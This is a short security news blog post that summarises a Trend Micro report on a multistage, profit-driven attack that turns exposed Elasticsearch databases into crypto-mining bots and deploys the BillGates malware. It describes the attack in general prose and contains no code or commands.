Cyberattack on Elasticseach Databases turns DBs into Zombies/Botnets

Recently a new cyberattack added into the list of Elasticsearch which is making Elasticsearch databases into Zombies or botnets.

Recently a new cyberattack added into the list of Elasticsearch which is making Elasticsearch databases into Zombies or botnets.

There is a list of attacks conducted on Elasticsearch databases in the past few years. The new one raises more tension among security experts due to its complexity and use of different tactics to evade security system and carry forward the attack successfully.

Elasticsearch is a popular tool that helps companies managing billions of records in the database easily. Its source code is open and big companies like Netflix, Uber, Dell, and Adobe are already using Elasticsearch. I hope you now have an idea of how important it is for hackers to find vulnerabilities in this tool and exploit them to gain systems control.

Recently, Trend Micro, a cybersecurity company revealed hackers have targetted publicly available Elasticsearch databases by delivering a backdoor as a payload.

The attack requires multiple scripts to be executed on the system, starting from disabling the system firewall and stopping all the crypto mining processes running on the system. Once these tasks are completed successfully then hackers download another script to the server from a compromised or a grey website.

If you are a blogger and wondering why bots are trying to break into your blog, mostly this is the reason why they do that. Hackers use compromised websites to conduct big cyber attacks. Well, this is another topic for another day.

In case the system detects the url and block the url trying to download malicious script, hackers can also change this url easily.

It is a profit-driven attack

This particular type of attack is profit-driven. Hacker in the first step stopped the firewall and then stop already-running cryptocurrency mining processes to start its own crypto mining processes.

Trend Micro also detected the malware named BillGates which steals system information and is able to launch DDoS attacks. The BillGates malware was first encountered in 2014. You can read about it on Akamai website.

The post also brings more attention to this kind of techniques used to evade the system detection and successfully complete the task is dangerous. Trend Micros also mentions that such attacks could be testing for conducting a bigger cyberattack in the future.

An attack that takes precautions to evade detection and uses multistage execution techniques is a red flag…

Trend Micro

For a more detailed analysis of the attack, please head over the trend micro website. They have also provided scripts images and described how each script does its job.

Leave A Reply

Your email address will not be published.

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. AcceptRead More